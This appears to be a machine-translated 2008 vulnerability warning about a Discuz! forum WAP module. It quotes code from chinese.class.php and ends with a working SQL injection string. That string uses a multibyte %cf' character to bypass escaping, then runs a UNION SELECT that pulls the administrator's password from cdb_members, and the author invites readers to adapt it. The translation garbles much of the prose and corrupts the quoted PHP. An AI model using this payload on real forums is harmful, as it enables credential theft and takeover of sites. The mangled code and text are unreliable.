Discuz! Forum the wap function module coding injection vulnerability-vulnerability warning-the black bar safety net

2008-08-06T00:00:00
ID MYHACK58:62200819948
Type myhack58
Reporter 佚名
Modified 2008-08-06T00:00:00

Description

Author: The Frozen prodigal son

Due to the hair in a blog on the vulnerability information to a bit beef up. Official has out patch. (Since PHP for multibyte character sets support the existence of problem in various coding conversion process, it is possible to initiate a program overflow and program errors) I was angry(mb, day. tmd you share a hair) In this I say the following process:

if(defined('IN_DISCUZ')) { exit('Access Denied'); }

define('CODETABLE_DIR', DISCUZ_ROOT.'./ the include/tables/');

class Chinese {

var $table = "; var $iconv_enabled = false; var $unicode_table = array(); var $config = array ( 'SourceLang' => ", 'TargetLang' => ", 'GBtoUnicode_table' => 'gb-unicode. table', 'BIG5toUnicode_table' => 'big5-unicode. table', );

function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) { $this->config['SourceLang'] = $this->_lang($SourceLang); $this->config['TargetLang'] = $this->_lang($TargetLang);

if(! function_exists(’iconv’) && $this->config['TargetLang'] != 'BIG5' && !$ ForceTable) { $this->iconv_enabled = true; } else { $this->iconv_enabled = false; $this->OpenTable(); } }

function _lang($LangCode) { $LangCode = strtoupper($LangCode);

if(substr($LangCode, 0, 2) == ‘GB’) { return ‘GBK’; } elseif(substr($LangCode, 0, 3) == ‘BIG’) { return 'BIG5'; } elseif(substr($LangCode, 0, 3) == ‘UTF’) { return 'UTF-8'; } elseif(substr($LangCode, 0, 3) == ‘UNI’) { return ‘UNICODE’; } }

function _hex2bin($hexdata) { for($i=0; $i < strlen($hexdata); $i += 2) { $bindata .= chr(hexdec(substr($hexdata, $i, 2))); } return $bindata; }

chinese.class.php (utf-8 can not use)

searchid=2 2%cf'UNION SELECT 1,password,3,password//from//cdb_members//where//uid=1/*&do=submit

Above you their modify to go with it!